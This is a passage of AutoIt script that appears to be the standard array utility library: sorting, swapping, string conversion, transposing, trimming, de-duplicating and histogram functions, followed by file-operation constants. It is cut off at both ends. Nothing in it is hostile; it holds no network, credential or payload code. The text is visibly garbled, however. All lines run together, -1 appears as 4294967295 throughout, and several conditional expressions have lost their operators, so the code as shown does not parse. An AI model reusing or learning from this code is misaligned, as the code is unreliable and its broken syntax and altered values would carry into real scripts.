$AARRAY [$J + 1 ] = $AARRAY [$J ] $J -= 1 IF $J + 1 = $IPIVOT_LEFT THEN EXITLOOP WEND $AARRAY [$J + 1 ] = $IAI $I += 1 WEND ELSE WHILE 1 IF $IPIVOT_LEFT >= $IPIVOT_RIGHT THEN RETURN 1 $IPIVOT_LEFT += 1 IF $AARRAY [$IPIVOT_LEFT ] < $AARRAY [$IPIVOT_LEFT + 4294967295 ] THEN EXITLOOP WEND WHILE 1 $K = $IPIVOT_LEFT $IPIVOT_LEFT += 1 IF $IPIVOT_LEFT > $IPIVOT_RIGHT THEN EXITLOOP $IA1 = $AARRAY [$K ] $IA2 = $AARRAY [$IPIVOT_LEFT ] IF $IA1 < $IA2 THEN $IA2 = $IA1 $IA1 = $AARRAY [$IPIVOT_LEFT ] ENDIF $K -= 1 WHILE $IA1 < $AARRAY [$K ] $AARRAY [$K + 2 ] = $AARRAY [$K ] $K -= 1 WEND $AARRAY [$K + 2 ] = $IA1 WHILE $IA2 < $AARRAY [$K ] $AARRAY [$K + 1 ] = $AARRAY [$K ] $K -= 1 WEND $AARRAY [$K + 1 ] = $IA2 $IPIVOT_LEFT += 1 WEND $ILAST = $AARRAY [$IPIVOT_RIGHT ] $IPIVOT_RIGHT -= 1 WHILE $ILAST < $AARRAY [$IPIVOT_RIGHT ] $AARRAY [$IPIVOT_RIGHT + 1 ] = $AARRAY [$IPIVOT_RIGHT ] $IPIVOT_RIGHT -= 1 WEND $AARRAY [$IPIVOT_RIGHT + 1 ] = $ILAST ENDIF RETURN 1 ENDIF LOCAL $ISEVENTH = BITSHIFT ($ILENGTH , 3 ) + BITSHIFT ($ILENGTH , 6 ) + 1 LOCAL $IE1 , $IE2 , $IE3 , $IE4 , $IE5 , $T $IE3 = CEILING (($IPIVOT_LEFT + $IPIVOT_RIGHT ) / 2 ) $IE2 = $IE3 - $ISEVENTH $IE1 = $IE2 - $ISEVENTH $IE4 = $IE3 + $ISEVENTH $IE5 = $IE4 + $ISEVENTH IF $AARRAY [$IE2 ] < $AARRAY [$IE1 ] THEN $T = $AARRAY [$IE2 ] $AARRAY [$IE2 ] = $AARRAY [$IE1 ] $AARRAY [$IE1 ] = $T ENDIF IF $AARRAY [$IE3 ] < $AARRAY [$IE2 ] THEN $T = $AARRAY [$IE3 ] $AARRAY [$IE3 ] = $AARRAY [$IE2 ] $AARRAY [$IE2 ] = $T IF $T < $AARRAY [$IE1 ] THEN $AARRAY [$IE2 ] = $AARRAY [$IE1 ] $AARRAY [$IE1 ] = $T ENDIF ENDIF IF $AARRAY [$IE4 ] < $AARRAY [$IE3 ] THEN $T = $AARRAY [$IE4 ] $AARRAY [$IE4 ] = $AARRAY [$IE3 ] $AARRAY [$IE3 ] = $T IF $T < $AARRAY [$IE2 ] THEN $AARRAY [$IE3 ] = $AARRAY [$IE2 ] $AARRAY [$IE2 ] = $T IF $T < $AARRAY [$IE1 ] THEN $AARRAY [$IE2 ] = $AARRAY [$IE1 ] $AARRAY [$IE1 ] = $T ENDIF ENDIF ENDIF IF $AARRAY [$IE5 ] < $AARRAY [$IE4 ] THEN $T = $AARRAY [$IE5 ] $AARRAY [$IE5 ] = $AARRAY [$IE4 ] $AARRAY [$IE4 ] = $T IF $T < $AARRAY [$IE3 ] THEN $AARRAY [$IE4 ] = $AARRAY [$IE3 ] $AARRAY [$IE3 ] = $T IF $T < $AARRAY [$IE2 ] THEN $AARRAY [$IE3 ] = $AARRAY [$IE2 ] $AARRAY [$IE2 ] = $T IF $T < $AARRAY [$IE1 ] THEN $AARRAY [$IE2 ] = $AARRAY [$IE1 ] $AARRAY [$IE1 ] = $T ENDIF ENDIF ENDIF ENDIF LOCAL $ILESS = $IPIVOT_LEFT LOCAL $IGREATER = $IPIVOT_RIGHT IF (($AARRAY [$IE1 ] <> $AARRAY [$IE2 ] ) AND ($AARRAY [$IE2 ] <> $AARRAY [$IE3 ] ) AND ($AARRAY [$IE3 ] <> $AARRAY [$IE4 ] ) AND ($AARRAY [$IE4 ] <> $AARRAY [$IE5 ] ) ) THEN LOCAL $IPIVOT_1 = $AARRAY [$IE2 ] LOCAL $IPIVOT_2 = $AARRAY [$IE4 ] $AARRAY [$IE2 ] = $AARRAY [$IPIVOT_LEFT ] $AARRAY [$IE4 ] = $AARRAY [$IPIVOT_RIGHT ] DO $ILESS += 1 UNTIL $AARRAY [$ILESS ] >= $IPIVOT_1 DO $IGREATER -= 1 UNTIL $AARRAY [$IGREATER ] <= $IPIVOT_2 $K = $ILESS WHILE $K <= $IGREATER $IAK = $AARRAY [$K ] IF $IAK < $IPIVOT_1 THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $IAK $ILESS += 1 ELSEIF $IAK > $IPIVOT_2 THEN WHILE $AARRAY [$IGREATER ] > $IPIVOT_2 $IGREATER -= 1 IF $IGREATER + 1 = $K THEN EXITLOOP 2 WEND IF $AARRAY [$IGREATER ] < $IPIVOT_1 THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $AARRAY [$IGREATER ] $ILESS += 1 ELSE $AARRAY [$K ] = $AARRAY [$IGREATER ] ENDIF $AARRAY [$IGREATER ] = $IAK $IGREATER -= 1 ENDIF $K += 1 WEND $AARRAY [$IPIVOT_LEFT ] = $AARRAY [$ILESS + 4294967295 ] $AARRAY [$ILESS + 4294967295 ] = $IPIVOT_1 $AARRAY [$IPIVOT_RIGHT ] = $AARRAY [$IGREATER + 1 ] $AARRAY [$IGREATER + 1 ] = $IPIVOT_2 __ARRAYDUALPIVOTSORT ($AARRAY , $IPIVOT_LEFT , $ILESS + 4294967294 , TRUE ) __ARRAYDUALPIVOTSORT ($AARRAY , $IGREATER + 2 , $IPIVOT_RIGHT , FALSE ) IF ($ILESS < $IE1 ) AND ($IE5 < $IGREATER ) THEN WHILE $AARRAY [$ILESS ] = $IPIVOT_1 $ILESS += 1 WEND WHILE $AARRAY [$IGREATER ] = $IPIVOT_2 $IGREATER -= 1 WEND $K = $ILESS WHILE $K <= $IGREATER $IAK = $AARRAY [$K ] IF $IAK = $IPIVOT_1 THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $IAK $ILESS += 1 ELSEIF $IAK = $IPIVOT_2 THEN WHILE $AARRAY [$IGREATER ] = $IPIVOT_2 $IGREATER -= 1 IF $IGREATER + 1 = $K THEN EXITLOOP 2 WEND IF $AARRAY [$IGREATER ] = $IPIVOT_1 THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $IPIVOT_1 $ILESS += 1 ELSE $AARRAY [$K ] = $AARRAY [$IGREATER ] ENDIF $AARRAY [$IGREATER ] = $IAK $IGREATER -= 1 ENDIF $K += 1 WEND ENDIF __ARRAYDUALPIVOTSORT ($AARRAY , $ILESS , $IGREATER , FALSE ) ELSE LOCAL $IPIVOT = $AARRAY [$IE3 ] $K = $ILESS WHILE $K <= $IGREATER IF $AARRAY [$K ] = $IPIVOT THEN $K += 1 CONTINUELOOP ENDIF $IAK = $AARRAY [$K ] IF $IAK < $IPIVOT THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $IAK $ILESS += 1 ELSE WHILE $AARRAY [$IGREATER ] > $IPIVOT $IGREATER -= 1 WEND IF $AARRAY [$IGREATER ] < $IPIVOT THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $AARRAY [$IGREATER ] $ILESS += 1 ELSE $AARRAY [$K ] = $IPIVOT ENDIF $AARRAY [$IGREATER ] = $IAK $IGREATER -= 1 ENDIF $K += 1 WEND __ARRAYDUALPIVOTSORT ($AARRAY , $IPIVOT_LEFT , $ILESS + 4294967295 , TRUE ) __ARRAYDUALPIVOTSORT ($AARRAY , $IGREATER + 1 , $IPIVOT_RIGHT , FALSE ) ENDIF ENDFUNC FUNC _ARRAYSWAP (BYREF $AARRAY , $IINDEX_1 , $IINDEX_2 , $BCOL = FALSE , $ISTART = + 4294967295 , $IEND = + 4294967295 ) IF $BCOL = DEFAULT THEN $BCOL = FALSE IF $ISTART = DEFAULT THEN $ISTART = + 4294967295 IF $IEND = DEFAULT THEN $IEND = + 4294967295 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $IDIM_2 = + 4294967295 THEN $BCOL = FALSE $ISTART = + 4294967295 $IEND = + 4294967295 ENDIF IF $ISTART > $IEND THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $BCOL THEN IF $IINDEX_1 < 0 OR $IINDEX_2 > $IDIM_2 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART = + 4294967295 THEN $ISTART = 0 IF $IEND = + 4294967295 THEN $IEND = $IDIM_1 ELSE IF $IINDEX_1 < 0 OR $IINDEX_2 > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART = + 4294967295 THEN $ISTART = 0 IF $IEND = + 4294967295 THEN $IEND = $IDIM_2 ENDIF LOCAL $VTMP SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 $VTMP = $AARRAY [$IINDEX_1 ] $AARRAY [$IINDEX_1 ] = $AARRAY [$IINDEX_2 ] $AARRAY [$IINDEX_2 ] = $VTMP CASE 2 IF $ISTART < + 4294967295 OR $IEND < + 4294967295 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) IF $BCOL THEN IF $ISTART > $IDIM_1 OR $IEND > $IDIM_1 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) FOR $J = $ISTART TO $IEND $VTMP = $AARRAY [$J ] [$IINDEX_1 ] $AARRAY [$J ] [$IINDEX_1 ] = $AARRAY [$J ] [$IINDEX_2 ] $AARRAY [$J ] [$IINDEX_2 ] = $VTMP NEXT ELSE IF $ISTART > $IDIM_2 OR $IEND > $IDIM_2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) FOR $J = $ISTART TO $IEND $VTMP = $AARRAY [$IINDEX_1 ] [$J ] $AARRAY [$IINDEX_1 ] [$J ] = $AARRAY [$IINDEX_2 ] [$J ] $AARRAY [$IINDEX_2 ] [$J ] = $VTMP NEXT ENDIF CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYTOCLIP (CONST BYREF $AARRAY , $SDELIM_COL = "|" , $ISTART_ROW = + 4294967295 , $IEND_ROW = + 4294967295 , $SDELIM_ROW = @CRLF , $ISTART_COL = + 4294967295 , $IEND_COL = + 4294967295 ) LOCAL $SRESULT = _ARRAYTOSTRING ($AARRAY , $SDELIM_COL , $ISTART_ROW , $IEND_ROW , $SDELIM_ROW , $ISTART_COL , $IEND_COL ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , 0 ) IF CLIPPUT ($SRESULT ) THEN RETURN 1 RETURN SETERROR (+ 4294967295 , 0 , 0 ) ENDFUNC FUNC _ARRAYTOSTRING (CONST BYREF $AARRAY , $SDELIM_COL = "|" , $ISTART_ROW = + 4294967295 , $IEND_ROW = + 4294967295 , $SDELIM_ROW = @CRLF , $ISTART_COL = + 4294967295 , $IEND_COL = + 4294967295 ) IF $SDELIM_COL = DEFAULT THEN $SDELIM_COL = "|" IF $SDELIM_ROW = DEFAULT THEN $SDELIM_ROW = @CRLF IF $ISTART_ROW = DEFAULT THEN $ISTART_ROW = + 4294967295 IF $IEND_ROW = DEFAULT THEN $IEND_ROW = + 4294967295 IF $ISTART_COL = DEFAULT THEN $ISTART_COL = + 4294967295 IF $IEND_COL = DEFAULT THEN $IEND_COL = + 4294967295 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $ISTART_ROW = + 4294967295 THEN $ISTART_ROW = 0 IF $IEND_ROW = + 4294967295 THEN $IEND_ROW = $IDIM_1 IF $ISTART_ROW < + 4294967295 OR $IEND_ROW < + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART_ROW > $IDIM_1 OR $IEND_ROW > $IDIM_1 THEN RETURN SETERROR (3 , 0 , "" ) IF $ISTART_ROW > $IEND_ROW THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $SRET = "" SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 FOR $I = $ISTART_ROW TO $IEND_ROW $SRET &= $AARRAY [$I ] & $SDELIM_COL NEXT RETURN STRINGTRIMRIGHT ($SRET , STRINGLEN ($SDELIM_COL ) ) CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ISTART_COL = + 4294967295 THEN $ISTART_COL = 0 IF $IEND_COL = + 4294967295 THEN $IEND_COL = $IDIM_2 IF $ISTART_COL < + 4294967295 OR $IEND_COL < + 4294967295 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IDIM_2 OR $IEND_COL > $IDIM_2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IEND_COL THEN RETURN SETERROR (6 , 0 , + 4294967295 ) FOR $I = $ISTART_ROW TO $IEND_ROW FOR $J = $ISTART_COL TO $IEND_COL $SRET &= $AARRAY [$I ] [$J ] & $SDELIM_COL NEXT $SRET = STRINGTRIMRIGHT ($SRET , STRINGLEN ($SDELIM_COL ) ) & $SDELIM_ROW NEXT RETURN STRINGTRIMRIGHT ($SRET , STRINGLEN ($SDELIM_ROW ) ) CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYTRANSPOSE (BYREF $AARRAY ) SWITCH UBOUND ($AARRAY , 0 ) CASE 0 RETURN SETERROR (2 , 0 , 0 ) CASE 1 LOCAL $ATEMP [1 ] [UBOUND ($AARRAY ) ] FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $ATEMP [0 ] [$I ] = $AARRAY [$I ] NEXT $AARRAY = $ATEMP CASE 2 LOCAL $IDIM_1 = UBOUND ($AARRAY , 1 ) , $IDIM_2 = UBOUND ($AARRAY , 2 ) IF $IDIM_1 <> $IDIM_2 THEN LOCAL $ATEMP [$IDIM_2 ] [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = 0 TO $IDIM_2 + 4294967295 $ATEMP [$J ] [$I ] = $AARRAY [$I ] [$J ] NEXT NEXT $AARRAY = $ATEMP ELSE LOCAL $VELEMENT FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $I + 1 TO $IDIM_2 + 4294967295 $VELEMENT = $AARRAY [$I ] [$J ] $AARRAY [$I ] [$J ] = $AARRAY [$J ] [$I ] $AARRAY [$J ] [$I ] = $VELEMENT NEXT NEXT ENDIF CASE ELSE RETURN SETERROR (1 , 0 , 0 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYTRIM (BYREF $AARRAY , $ITRIMNUM , $IDIRECTION = 0 , $ISTART = 0 , $IEND = 0 , $ISUBITEM = 0 ) IF $IDIRECTION = DEFAULT THEN $IDIRECTION = 0 IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $IEND = 0 THEN $IEND = $IDIM_1 IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART < 0 OR $IEND < 0 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IDIM_1 OR $IEND > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IDIRECTION THEN FOR $I = $ISTART TO $IEND $AARRAY [$I ] = STRINGTRIMRIGHT ($AARRAY [$I ] , $ITRIMNUM ) NEXT ELSE FOR $I = $ISTART TO $IEND $AARRAY [$I ] = STRINGTRIMLEFT ($AARRAY [$I ] , $ITRIMNUM ) NEXT ENDIF CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ISUBITEM < 0 OR $ISUBITEM > $IDIM_2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $IDIRECTION THEN FOR $I = $ISTART TO $IEND $AARRAY [$I ] [$ISUBITEM ] = STRINGTRIMRIGHT ($AARRAY [$I ] [$ISUBITEM ] , $ITRIMNUM ) NEXT ELSE FOR $I = $ISTART TO $IEND $AARRAY [$I ] [$ISUBITEM ] = STRINGTRIMLEFT ($AARRAY [$I ] [$ISUBITEM ] , $ITRIMNUM ) NEXT ENDIF CASE ELSE RETURN SETERROR (2 , 0 , 0 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYUNIQUE (CONST BYREF $AARRAY , $ICOLUMN = 0 , $IBASE = 0 , $ICASE = 0 , $ICOUNT = $ARRAYUNIQUE_COUNT , $IINTTYPE = $ARRAYUNIQUE_AUTO ) IF $ICOLUMN = DEFAULT THEN $ICOLUMN = 0 IF $IBASE = DEFAULT THEN $IBASE = 0 IF $ICASE = DEFAULT THEN $ICASE = 0 IF $ICOUNT = DEFAULT THEN $ICOUNT = $ARRAYUNIQUE_COUNT IF UBOUND ($AARRAY , $UBOUND_ROWS ) = 0 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IDIMS = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) , $INUMCOLUMNS = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $IDIMS > 2 THEN RETURN SETERROR (2 , 0 , 0 ) IF $IBASE < 0 OR $IBASE > 1 OR (NOT ISINT ($IBASE ) ) THEN RETURN SETERROR (3 , 0 , 0 ) IF $ICASE < 0 OR $ICASE > 1 OR (NOT ISINT ($ICASE ) ) THEN RETURN SETERROR (3 , 0 , 0 ) IF $ICOUNT < 0 OR $ICOUNT > 1 OR (NOT ISINT ($ICOUNT ) ) THEN RETURN SETERROR (4 , 0 , 0 ) IF $IINTTYPE < 0 OR $IINTTYPE > 4 OR (NOT ISINT ($IINTTYPE ) ) THEN RETURN SETERROR (5 , 0 , 0 ) IF $ICOLUMN < 0 OR ($INUMCOLUMNS = 0 AND $ICOLUMN > 0 ) OR ($INUMCOLUMNS > 0 AND $ICOLUMN >= $INUMCOLUMNS ) THEN RETURN SETERROR (6 , 0 , 0 ) IF $IINTTYPE = $ARRAYUNIQUE_AUTO THEN LOCAL $VFIRSTELEM = (($IDIMS = 1 ) ($AARRAY [$IBASE ] ) ($AARRAY [$ICOLUMN ] [$IBASE ] ) ) IF ISINT ($VFIRSTELEM ) THEN SWITCH VARGETTYPE ($VFIRSTELEM ) CASE "Int32" $IINTTYPE = $ARRAYUNIQUE_FORCE32 CASE "Int64" $IINTTYPE = $ARRAYUNIQUE_FORCE64 ENDSWITCH ELSE $IINTTYPE = $ARRAYUNIQUE_FORCE32 ENDIF ENDIF OBJEVENT ("AutoIt.Error" , "__ArrayUnique_AutoErrFunc" ) LOCAL $ODICTIONARY = OBJCREATE ("Scripting.Dictionary" ) $ODICTIONARY.CompareMode = NUMBER (NOT $ICASE ) LOCAL $VELEM , $STYPE , $VKEY , $BCOMERROR = FALSE FOR $I = $IBASE TO UBOUND ($AARRAY ) + 4294967295 IF $IDIMS = 1 THEN $VELEM = $AARRAY [$I ] ELSE $VELEM = $AARRAY [$I ] [$ICOLUMN ] ENDIF SWITCH $IINTTYPE CASE $ARRAYUNIQUE_FORCE32 $ODICTIONARY.Item ($VELEM ) IF @ERROR THEN $BCOMERROR = TRUE EXITLOOP ENDIF CASE $ARRAYUNIQUE_FORCE64 $STYPE = VARGETTYPE ($VELEM ) IF $STYPE = "Int32" THEN $BCOMERROR = TRUE EXITLOOP ENDIF $VKEY = "#" & $STYPE & "#" & STRING ($VELEM ) IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF CASE $ARRAYUNIQUE_MATCH $STYPE = VARGETTYPE ($VELEM ) IF STRINGLEFT ($STYPE , 3 ) = "Int" THEN $VKEY = "#Int#" & STRING ($VELEM ) ELSE $VKEY = "#" & $STYPE & "#" & STRING ($VELEM ) ENDIF IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF CASE $ARRAYUNIQUE_DISTINCT $VKEY = "#" & VARGETTYPE ($VELEM ) & "#" & STRING ($VELEM ) IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF ENDSWITCH NEXT LOCAL $AVALUES , $J = 0 IF $BCOMERROR THEN RETURN SETERROR (7 , 0 , 0 ) ELSEIF $IINTTYPE <> $ARRAYUNIQUE_FORCE32 THEN LOCAL $AVALUES [$ODICTIONARY.Count ] FOR $VKEY IN $ODICTIONARY.Keys () $AVALUES [$J ] = $ODICTIONARY ($VKEY ) IF STRINGLEFT ($VKEY , 5 ) = "#Ptr#" THEN $AVALUES [$J ] = PTR ($AVALUES [$J ] ) ENDIF $J += 1 NEXT ELSE $AVALUES = $ODICTIONARY.Keys () ENDIF IF $ICOUNT THEN _ARRAYINSERT ($AVALUES , 0 , $ODICTIONARY.Count ) ENDIF RETURN $AVALUES ENDFUNC FUNC _ARRAY1DTOHISTOGRAM ($AARRAY , $ISIZING = 100 ) IF UBOUND ($AARRAY , 0 ) > 1 THEN RETURN SETERROR (1 , 0 , "" ) $ISIZING = $ISIZING * 8 LOCAL $T , $N , $IMIN = 0 , $IMAX = 0 , $IOFFSET = 0 FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $T = $AARRAY [$I ] $T = ISNUMBER ($T ) ROUND ($T ) 0 IF $T < $IMIN THEN $IMIN = $T IF $T > $IMAX THEN $IMAX = $T NEXT LOCAL $IRANGE = INT (ROUND (($IMAX - $IMIN ) / 8 ) ) * 8 LOCAL $ISPACERATIO = 4 FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $T = $AARRAY [$I ] IF $T THEN $N = ABS (ROUND (($ISIZING * $T ) / $IRANGE ) / 8 ) $AARRAY [$I ] = "" IF $T > 0 THEN IF $IMIN THEN $IOFFSET = INT (ABS (ROUND (($ISIZING * $IMIN ) / $IRANGE ) / 8 ) / 8 * $ISPACERATIO ) $AARRAY [$I ] = __ARRAY_STRINGREPEAT (CHRW (32 ) , $IOFFSET ) ENDIF ELSE IF $IMIN <> $T THEN $IOFFSET = INT (ABS (ROUND (($ISIZING * ($T - $IMIN ) ) / $IRANGE ) / 8 ) / 8 * $ISPACERATIO ) $AARRAY [$I ] = __ARRAY_STRINGREPEAT (CHRW (32 ) , $IOFFSET ) ENDIF ENDIF $AARRAY [$I ] &= __ARRAY_STRINGREPEAT (CHRW (9608 ) , INT ($N / 8 ) ) $N = MOD ($N , 8 ) IF $N > 0 THEN $AARRAY [$I ] &= CHRW (9608 + 8 - $N ) $AARRAY [$I ] &= " " & $T ELSE $AARRAY [$I ] = "" ENDIF NEXT RETURN $AARRAY ENDFUNC FUNC __ARRAY_STRINGREPEAT ($SSTRING , $IREPEATCOUNT ) $IREPEATCOUNT = INT ($IREPEATCOUNT ) IF STRINGLEN ($SSTRING ) < 1 OR $IREPEATCOUNT <= 0 THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $SRESULT = "" WHILE $IREPEATCOUNT > 1 IF BITAND ($IREPEATCOUNT , 1 ) THEN $SRESULT &= $SSTRING $SSTRING &= $SSTRING $IREPEATCOUNT = BITSHIFT ($IREPEATCOUNT , 1 ) WEND RETURN $SSTRING & $SRESULT ENDFUNC FUNC __ARRAY_EXETERINTERNAL (BYREF $AARRAY , $ISTART , $ISIZE , $SDELIMITER , BYREF $AIDX , BYREF $ARESULT , BYREF $ICOUNT ) IF $ISTART == $ISIZE + 4294967295 THEN FOR $I = 0 TO $ISIZE + 4294967295 $ARESULT [$ICOUNT ] &= $AARRAY [$AIDX [$I ] ] & $SDELIMITER NEXT IF $SDELIMITER <> "" THEN $ARESULT [$ICOUNT ] = STRINGTRIMRIGHT ($ARESULT [$ICOUNT ] , STRINGLEN ($SDELIMITER ) ) $ICOUNT += 1 ELSE LOCAL $ITEMP FOR $I = $ISTART TO $ISIZE + 4294967295 $ITEMP = $AIDX [$I ] $AIDX [$I ] = $AIDX [$ISTART ] $AIDX [$ISTART ] = $ITEMP __ARRAY_EXETERINTERNAL ($AARRAY , $ISTART + 1 , $ISIZE , $SDELIMITER , $AIDX , $ARESULT , $ICOUNT ) $AIDX [$ISTART ] = $AIDX [$I ] $AIDX [$I ] = $ITEMP NEXT ENDIF ENDFUNC FUNC __ARRAY_COMBINATIONS ($IN , $IR ) LOCAL $I_TOTAL = 1 FOR $I = $IR TO 1 STEP + 4294967295 $I_TOTAL *= ($IN / $I ) $IN -= 1 NEXT RETURN ROUND ($I_TOTAL ) ENDFUNC FUNC __ARRAY_GETNEXT ($IN , $IR , BYREF $ILEFT , $ITOTAL , BYREF $AIDX ) IF $ILEFT == $ITOTAL THEN $ILEFT -= 1 RETURN ENDIF LOCAL $I = $IR + 4294967295 WHILE $AIDX [$I ] == $IN - $IR + $I $I -= 1 WEND $AIDX [$I ] += 1 FOR $J = $I + 1 TO $IR + 4294967295 $AIDX [$J ] = $AIDX [$I ] + $J - $I NEXT $ILEFT -= 1 ENDFUNC FUNC __ARRAY_MINMAXINDEX (CONST BYREF $AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM , $FUCOMPARISON ) IF $ICOMPNUMERIC = DEFAULT THEN $ICOMPNUMERIC = 0 IF $ICOMPNUMERIC <> 1 THEN $ICOMPNUMERIC = 0 IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $IDIM_1 < 0 THEN RETURN SETERROR (1 , 0 , + 4294967295 ) IF $IEND = + 4294967295 THEN $IEND = $IDIM_1 IF $ISTART = + 4294967295 THEN $ISTART = 0 IF $ISTART < + 4294967295 OR $IEND < + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IDIM_1 OR $IEND > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) IF $IDIM_1 < 0 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $IMAXMININDEX = $ISTART SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $ICOMPNUMERIC THEN FOR $I = $ISTART TO $IEND IF $FUCOMPARISON (NUMBER ($AARRAY [$I ] ) , NUMBER ($AARRAY [$IMAXMININDEX ] ) ) THEN $IMAXMININDEX = $I NEXT ELSE FOR $I = $ISTART TO $IEND IF $FUCOMPARISON ($AARRAY [$I ] , $AARRAY [$IMAXMININDEX ] ) THEN $IMAXMININDEX = $I NEXT ENDIF CASE 2 IF $ISUBITEM < 0 OR $ISUBITEM > UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $ICOMPNUMERIC THEN FOR $I = $ISTART TO $IEND IF $FUCOMPARISON (NUMBER ($AARRAY [$I ] [$ISUBITEM ] ) , NUMBER ($AARRAY [$IMAXMININDEX ] [$ISUBITEM ] ) ) THEN $IMAXMININDEX = $I NEXT ELSE FOR $I = $ISTART TO $IEND IF $FUCOMPARISON ($AARRAY [$I ] [$ISUBITEM ] , $AARRAY [$IMAXMININDEX ] [$ISUBITEM ] ) THEN $IMAXMININDEX = $I NEXT ENDIF CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN $IMAXMININDEX ENDFUNC FUNC __ARRAY_GREATERTHAN ($VVALUE1 , $VVALUE2 ) RETURN $VVALUE1 > $VVALUE2 ENDFUNC FUNC __ARRAY_LESSTHAN ($VVALUE1 , $VVALUE2 ) RETURN $VVALUE1 < $VVALUE2 ENDFUNC FUNC __ARRAYUNIQUE_AUTOERRFUNC () ENDFUNC GLOBAL CONST $FC_NOOVERWRITE = 0 GLOBAL CONST $FC_OVERWRITE = 1 GLOBAL CONST $FC_CREATEPATH = 8 GLOBAL CONST $FT_MODIFIED = 0 GLOBAL CONST $FT_CREATED = 1 GLOBAL CONST $FT_ACCESSED = 2 GLOBAL CONST $FT_ARRAY = 0 GLOBAL CONST $FT_STRING = 1 GLOBAL CONST $FSF_CREATEBUTTON = 1 GLOBAL CONST $FSF_NEWDIALOG = 2 GLOBAL CONST $FSF_EDITCONTROL = 4 GLOBAL CONST $FT_NONRECURSIVE = 0 GLOBAL CONST $FT_RECURSIVE = 1 GLOBAL CONST $FO_READ = 0 GLOBAL CONST $FO_APPEND = 1 GLOBAL CONST $FO_OVERWRITE = 2 GLOBAL CONST $FO_CREATEPATH = 8 GLOBAL CONST $FO_BINARY = 16 GLOBAL CONST 